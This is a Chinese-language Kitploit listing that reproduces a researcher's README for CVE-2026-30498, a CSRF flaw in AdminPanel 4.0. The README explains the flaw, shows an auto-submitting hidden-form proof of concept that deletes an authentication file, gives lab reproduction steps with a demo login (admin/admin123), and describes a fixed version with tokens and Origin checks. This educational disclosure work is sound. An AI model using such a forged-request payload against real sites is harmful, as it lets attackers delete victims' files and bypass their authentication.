Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-30498 — 教育性 CSRF 漏洞演示,配有受控实验环境,包含概念验证漏洞利用以及具备适当 CSRF 防护的修复版本。 | Kitploit
工具/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
漏洞分析漏洞利用Web安全渗透测试学习与教育实验室与实践
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

教育性 CSRF 漏洞演示,配有受控实验环境,包含概念验证漏洞利用以及具备适当 CSRF 防护的修复版本。

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-30498 – CSRF 漏洞(AdminPanel 4.0)


概述

CVE 编号: CVE-2026-30498 (由 MITRE 保留)
发现者: Mehdi Ben Hamou

AdminPanel 4.0 的 delete.php 端点存在**跨站请求伪造(CSRF)**漏洞。

该漏洞允许攻击者在未经用户同意的情况下,以已认证用户的身份触发敏感操作(文件删除)。


技术细节

该漏洞是由于缺少 CSRF 防护机制所致:

  • 无 CSRF 令牌验证
  • 无 Origin / Referer 验证
  • 敏感操作通过 GET 请求暴露
  • 未验证用户意图

易受攻击的端点直接基于用户会话处理请求,而未验证请求来源。


影响

成功利用该漏洞将导致:

  • 删除 verifyPanel.php
  • 身份验证绕过
  • 应用程序进入设置模式
  • 可能完全重新初始化系统

受影响版本

  • AdminPanel 4.0 及更早版本 (已归档项目)

攻击场景

攻击者托管一个恶意网页,发送伪造请求:

root@kitploit:~
http://localhost:8080/delete.php?file=verifyPanel.php

当受害者(已认证用户)访问该页面时,浏览器会自动附带会话 Cookie,请求随即被执行。


概念验证(PoC)

恶意页面(攻击者)

root@kitploit:~
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

该请求会自动携带受害者的会话 Cookie 发送。


复现步骤

  1. 启动受害者服务器:
root@kitploit:~
php -S localhost:8080
  1. 访问登录页面:
root@kitploit:~
http://localhost:8080
  1. 使用以下凭据登录:
root@kitploit:~
admin / admin123
  1. 打开攻击者页面:
root@kitploit:~
http://localhost:8081/evil.html
  1. 发起 CSRF 攻击
  2. 返回仪表盘:
root@kitploit:~
/panel/dashboard.php

内部执行过程

  1. 受害者登录 → 创建会话 Cookie
  2. 攻击者页面发送伪造请求
  3. 浏览器自动附加 Cookie
  4. 服务器未经验证即执行删除操作
  5. 系统检测到缺少身份验证文件
  6. 应用程序进入设置模式

实验环境(教学模拟)

本仓库包含一个受控的实验环境,可安全地复现该漏洞。

重要提示: 本实验为模拟环境,并不代表原始 AdminPanel 代码库的确切内容。

重置实验环境

如需重置环境:

root@kitploit:~
/reset.php

修复版本(缓解措施)

已在以下文件中实现安全版本:

root@kitploit:~
delete_fixed.php

新增的防护措施:

  • ✅ CSRF 令牌验证
  • ✅ 仅允许 POST 方法
  • ✅ Origin / Referer 验证
  • ✅ 会话验证

修复生效的原因

  • 攻击者无法获取 CSRF 令牌(同源策略)
  • 伪造请求缺少有效令牌 → 被拒绝
  • 通过 Origin 检查阻止跨源请求

项目结构

root@kitploit:~
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

免责声明

本项目仅用于教育和研究目的。
未经适当授权,请勿在系统上使用此漏洞。

下载工具